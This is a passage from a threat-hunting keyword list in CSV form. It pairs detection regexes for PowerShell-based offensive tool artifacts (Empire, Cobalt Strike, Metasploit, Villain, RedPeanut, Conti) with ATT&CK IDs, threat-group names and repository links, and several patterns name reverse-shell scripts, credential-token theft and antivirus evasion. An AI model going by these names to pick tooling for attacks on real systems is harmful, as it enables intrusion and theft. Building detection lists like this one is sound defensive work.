MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*powershell_collection_screenshot*",".{0,1000}powershell_collection_screenshot.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*powershell_command_x64.ps1*",".{0,1000}powershell_command_x64\.ps1.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*powershell_command_x86.ps1*",".{0,1000}powershell_command_x86\.ps1.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*powershell_credentials_tokens*",".{0,1000}powershell_credentials_tokens.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*powershell_encode_oneliner*",".{0,1000}powershell_encode_oneliner.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*powershell_encode_oneliner*",".{0,1000}powershell_encode_oneliner.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*powershell_encode_stager*",".{0,1000}powershell_encode_stager.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*powershell_encode_stager*",".{0,1000}powershell_encode_stager.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*powershell_management_psinject*",".{0,1000}powershell_management_psinject.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*powershell_management_spawn*",".{0,1000}powershell_management_spawn.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*PowerShell_PoC.zip*",".{0,1000}PowerShell_PoC\.zip.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*powershell_privesc_bypassuac_eventvwr*",".{0,1000}powershell_privesc_bypassuac_eventvwr.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*powershell_privesc_sherlock*",".{0,1000}powershell_privesc_sherlock.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*powershell_reflective_mimikatz*",".{0,1000}powershell_reflective_mimikatz.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*powershell_reverse_shell.ps1*",".{0,1000}powershell_reverse_shell\.ps1.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1309","228","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "*powershell_reverse_tcp.*",".{0,1000}powershell_reverse_tcp\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*powershell_reverse_tcp.py*",".{0,1000}powershell_reverse_tcp\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*powershell_reverse_tcp_v2.py*",".{0,1000}powershell_reverse_tcp_v2\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*powershell-admin-download-execute.ino*",".{0,1000}powershell\-admin\-download\-execute\.ino.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","137","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" "*PowershellAgentGenerator.*",".{0,1000}PowershellAgentGenerator\..{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*PowershellAmsiGenerator*",".{0,1000}PowershellAmsiGenerator.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*PowerShellArsenal*",".{0,1000}PowerShellArsenal.{0,1000}","offensive_tool_keyword","PowerShellArsenal","PowerShellArsenal is a PowerShell module used to aid a reverse engineer. The module can be used to disassemble managed and unmanaged code. perform .NET malware analysis. analyze/scrape memory. parse file formats and memory structures. obtain internal system information. etc.","T1057 - T1053 - T1050 - T1564 - T1083 - T1003","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/mattifestation/PowerShellArsenal","1","1","N/A","N/A","9","844","228","2021-08-20T08:41:50Z","2014-11-16T15:20:17Z" "*PowerShellArtifactGenerator.py*",".{0,1000}PowerShellArtifactGenerator\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*PowershellCradleGenerator.*",".{0,1000}PowershellCradleGenerator\..{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*PowerShellEmpire*",".{0,1000}PowerShellEmpire.{0,1000}","offensive_tool_keyword","empire","PowerShell offers a multitude of offensive advantages. including full .NET access. application whitelisting. direct access to the Win32 API. the ability to assemble malicious binaries in memory. and a default installation on Windows 7+. Offensive PowerShell had a watershed year in 2014. but despite the multitude of useful projects. many pentesters still struggle to integrate PowerShell into their engagements in a secure manner.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://www.powershellempire.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*PowerShellExecuter.cs*",".{0,1000}PowerShellExecuter\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*powershell-import *.ps1*",".{0,1000}powershell\-import\s.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*powershell-import*Invoke-Kerberoast.ps1*",".{0,1000}powershell\-import.{0,1000}Invoke\-Kerberoast\.ps1.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*powershell-import*ShareFinder.ps1*",".{0,1000}powershell\-import.{0,1000}ShareFinder\.ps1.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*PowershellKerberos-main*",".{0,1000}PowershellKerberos\-main.{0,1000}","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","1","N/A","9","3","293","42","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z" "*PowerShellMafia*",".{0,1000}PowerShellMafia.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*PowerShellMafia/PowerSCCM*",".{0,1000}PowerShellMafia\/PowerSCCM.{0,1000}","offensive_tool_keyword","PowerSCCM","PowerSCCM - PowerShell module to interact with SCCM deployments","T1059.001 - T1018 - T1072 - T1047","TA0005 - TA0003 - TA0002","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSCCM","1","1","N/A","8","4","327","109","2022-01-22T15:30:56Z","2016-01-28T00:20:22Z" "*PowerShellMafia/PowerSploit*",".{0,1000}PowerShellMafia\/PowerSploit.{0,1000}","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - 